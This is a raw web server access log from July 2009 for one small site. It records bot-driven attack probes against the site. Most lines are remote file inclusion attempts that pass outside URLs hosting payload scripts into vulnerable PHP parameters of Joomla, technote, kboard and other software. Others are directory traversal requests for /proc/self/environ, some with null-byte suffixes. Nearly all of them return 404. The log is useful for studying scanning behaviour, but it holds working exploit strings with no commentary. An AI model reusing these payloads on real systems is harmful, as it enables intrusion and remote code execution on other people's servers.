84.51.241.6 - - [04/Jul/2009:15:24:54 -0700] "GET /logs/access.log%20%20/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
74.223.143.131 - - [04/Jul/2009:15:34:09 -0700] "GET /logs/access.log/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
74.223.143.131 - - [04/Jul/2009:15:35:50 -0700] "GET /?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.hellionindustries.com"
74.223.143.131 - - [04/Jul/2009:15:35:50 -0700] "GET /logs/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 1510 "-" "Mozilla/5.0" "www.hellionindustries.com"
74.223.143.131 - - [04/Jul/2009:15:35:51 -0700] "GET /logs/scripts.log/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:15:37:29 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:15:37:29 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:15:37:29 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:15:37:32 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:15:37:32 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:15:37:32 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:15:38:02 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:15:38:02 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:15:38:02 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:15:38:24 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:15:38:25 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:15:38:25 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:15:49:48 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:15:49:48 -0700] "GET /logs/access.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:15:49:48 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:15:49:51 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:15:49:51 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:15:49:51 -0700] "GET /logs/access.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:15:51:22 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:15:51:22 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:15:51:22 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:15:51:28 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:15:51:28 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:15:51:28 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:15:54:39 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:15:55:28 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:15:59:26 -0700] "GET /?sourcedir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:15:59:26 -0700] "GET /logs/?sourcedir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1510 "-" "Mozilla/5.0" "hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:15:59:26 -0700] "GET /logs/access.log/?sourcedir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:16:00:27 -0700] "GET /logs/?sourcedir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1510 "-" "Mozilla/5.0" "hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:16:00:27 -0700] "GET /?sourcedir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:16:00:27 -0700] "GET /logs/access.log/?sourcedir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:16:01:25 -0700] "GET /logs/scripts.log/?sourcedir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:16:01:25 -0700] "GET /?sourcedir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:16:01:25 -0700] "GET /logs/?sourcedir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1510 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:16:02:19 -0700] "GET /?sourcedir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:16:02:19 -0700] "GET /logs/scripts.log/?sourcedir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:16:02:19 -0700] "GET /logs/?sourcedir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1510 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.51.241.6 - - [04/Jul/2009:16:03:14 -0700] "GET /logs/access.log/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
84.38.65.112 - - [04/Jul/2009:16:03:51 -0700] "GET /logs/access.log/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
84.51.241.6 - - [04/Jul/2009:16:05:12 -0700] "GET /?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.51.241.6 - - [04/Jul/2009:16:05:12 -0700] "GET /logs/scripts.log/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.51.241.6 - - [04/Jul/2009:16:05:12 -0700] "GET /logs/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 1510 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.108.84.112 - - [04/Jul/2009:16:06:11 -0700] "GET /logs/access.log/atom.php5?page=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
89.108.84.112 - - [04/Jul/2009:16:06:12 -0700] "GET /atom.php5?page=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
89.108.84.112 - - [04/Jul/2009:16:06:12 -0700] "GET /logs/atom.php5?page=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
78.110.50.110 - - [04/Jul/2009:16:06:34 -0700] "GET /logs/access.log/atom.php5?page=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "hellionindustries.com"
78.110.50.110 - - [04/Jul/2009:16:06:35 -0700] "GET /atom.php5?page=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "hellionindustries.com"
78.110.50.110 - - [04/Jul/2009:16:06:36 -0700] "GET /logs/atom.php5?page=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "hellionindustries.com"
84.38.65.112 - - [04/Jul/2009:16:06:46 -0700] "GET /logs/scripts.log/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.38.65.112 - - [04/Jul/2009:16:06:46 -0700] "GET /?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.38.65.112 - - [04/Jul/2009:16:06:46 -0700] "GET /logs/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 1510 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.108.84.112 - - [04/Jul/2009:16:08:04 -0700] "GET /atom.php5?page=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
66.232.143.238 - - [04/Jul/2009:16:08:59 -0700] "GET /logs/access.log/atom.php5?page=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
66.232.143.238 - - [04/Jul/2009:16:09:00 -0700] "GET /atom.php5?page=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
66.232.143.238 - - [04/Jul/2009:16:09:00 -0700] "GET /logs/atom.php5?page=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
66.232.143.238 - - [04/Jul/2009:16:10:10 -0700] "GET /atom.php5?page=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
85.158.185.67 - - [04/Jul/2009:16:12:46 -0700] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.hellionindustries.com"
85.158.185.67 - - [04/Jul/2009:16:12:46 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.hellionindustries.com"
85.158.185.67 - - [04/Jul/2009:16:12:47 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.hellionindustries.com"
85.158.185.67 - - [04/Jul/2009:16:12:47 -0700] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.hellionindustries.com"
116.121.201.73 - - [04/Jul/2009:16:16:39 -0700] "GET /logs/access.log%20%20//components/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
116.121.201.73 - - [04/Jul/2009:16:16:39 -0700] "GET /logs//components/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
116.121.201.73 - - [04/Jul/2009:16:16:39 -0700] "GET /components/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
116.121.201.73 - - [04/Jul/2009:16:16:41 -0700] "GET /logs/access.log%20%20//components/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
116.121.201.73 - - [04/Jul/2009:16:16:42 -0700] "GET /logs//components/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
116.121.201.73 - - [04/Jul/2009:16:16:42 -0700] "GET /components/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.108.84.112 - - [04/Jul/2009:16:16:52 -0700] "GET /atom.php5?page=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
78.110.50.110 - - [04/Jul/2009:16:16:53 -0700] "GET /atom.php5?page=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "hellionindustries.com"
85.158.185.67 - - [04/Jul/2009:16:17:10 -0700] "GET /logs/access.log//main.php?sayfa=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "hellionindustries.com"
85.158.185.67 - - [04/Jul/2009:16:17:10 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "hellionindustries.com"
85.158.185.67 - - [04/Jul/2009:16:17:10 -0700] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "hellionindustries.com"
85.158.185.67 - - [04/Jul/2009:16:17:11 -0700] "GET /logs/access.log//main.php?sayfa=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "hellionindustries.com"
85.158.185.67 - - [04/Jul/2009:16:17:11 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "hellionindustries.com"
85.158.185.67 - - [04/Jul/2009:16:17:11 -0700] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "hellionindustries.com"
72.30.142.151 - - [04/Jul/2009:16:19:49 -0700] "GET /logs/?S=A HTTP/1.0" 200 1494 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "hellionindustries.com"
116.121.201.73 - - [04/Jul/2009:16:20:02 -0700] "GET /components/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
116.121.201.73 - - [04/Jul/2009:16:20:21 -0700] "GET /logs//components/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
116.121.201.73 - - [04/Jul/2009:16:20:21 -0700] "GET /logs/scripts.log%20%20//components/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
116.121.201.73 - - [04/Jul/2009:16:20:35 -0700] "GET /components/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
116.121.201.73 - - [04/Jul/2009:16:20:36 -0700] "GET /logs/scripts.log%20%20//components/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
116.121.201.73 - - [04/Jul/2009:16:20:36 -0700] "GET /logs//components/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
116.121.201.73 - - [04/Jul/2009:16:23:51 -0700] "GET /logs/access.log//components/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
116.121.201.73 - - [04/Jul/2009:16:24:08 -0700] "GET /logs/access.log//components/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
116.121.201.73 - - [04/Jul/2009:16:24:59 -0700] "GET /logs/access.log//components/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
116.121.201.73 - - [04/Jul/2009:16:26:27 -0700] "GET /logs/scripts.log//components/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
116.121.201.73 - - [04/Jul/2009:16:26:34 -0700] "GET /logs/scripts.log//components/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
78.110.50.110 - - [04/Jul/2009:16:28:24 -0700] "GET /atom.php5?page=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "hellionindustries.com"
91.195.124.16 - - [04/Jul/2009:16:31:53 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "hellionindustries.com"
91.195.124.16 - - [04/Jul/2009:16:31:53 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "hellionindustries.com"
91.195.124.16 - - [04/Jul/2009:16:31:53 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "hellionindustries.com"
91.195.124.16 - - [04/Jul/2009:16:31:53 -0700] "GET /logs/access.log/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "hellionindustries.com"
91.195.124.16 - - [04/Jul/2009:16:31:53 -0700] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "hellionindustries.com"
91.195.124.16 - - [04/Jul/2009:16:31:53 -0700] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "hellionindustries.com"
91.195.124.16 - - [04/Jul/2009:16:31:54 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "hellionindustries.com"
91.195.124.16 - - [04/Jul/2009:16:31:54 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "hellionindustries.com"
91.195.124.16 - - [04/Jul/2009:16:31:54 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "hellionindustries.com"
91.195.124.16 - - [04/Jul/2009:16:31:54 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "hellionindustries.com"
91.195.124.16 - - [04/Jul/2009:16:31:54 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "hellionindustries.com"
91.195.124.16 - - [04/Jul/2009:16:31:54 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "hellionindustries.com"
66.232.143.238 - - [04/Jul/2009:16:33:58 -0700] "GET /atom.php5?page=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
203.237.238.234 - - [04/Jul/2009:16:37:05 -0700] "GET /logs/access.log//include/db.inc.php?skin_board_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
203.237.238.234 - - [04/Jul/2009:16:37:05 -0700] "GET /logs//include/db.inc.php?skin_board_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
203.237.238.234 - - [04/Jul/2009:16:37:05 -0700] "GET /include/db.inc.php?skin_board_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
203.237.238.234 - - [04/Jul/2009:16:37:31 -0700] "GET /include/db.inc.php?skin_board_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
203.237.238.234 - - [04/Jul/2009:16:37:31 -0700] "GET /logs/access.log//include/db.inc.php?skin_board_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
203.237.238.234 - - [04/Jul/2009:16:37:31 -0700] "GET /logs//include/db.inc.php?skin_board_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
85.158.185.67 - - [04/Jul/2009:16:45:09 -0700] "GET /logs/index_principal.php?pagina=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.hellionindustries.com"
85.158.185.67 - - [04/Jul/2009:16:45:09 -0700] "GET /index_principal.php?pagina=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.hellionindustries.com"
85.158.185.67 - - [04/Jul/2009:16:45:10 -0700] "GET /logs/index_principal.php?pagina=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.hellionindustries.com"
85.158.185.67 - - [04/Jul/2009:16:45:10 -0700] "GET /index_principal.php?pagina=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.hellionindustries.com"
77.221.130.19 - - [04/Jul/2009:17:00:59 -0700] "GET /standard//3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.oalcs.org/school/pages/about/about?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:17:03:25 -0700] "GET /include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:17:03:25 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:17:03:25 -0700] "GET /logs/access.log%20%20//include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
116.121.201.73 - - [04/Jul/2009:17:03:27 -0700] "GET /logs/access.log%20%20//modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
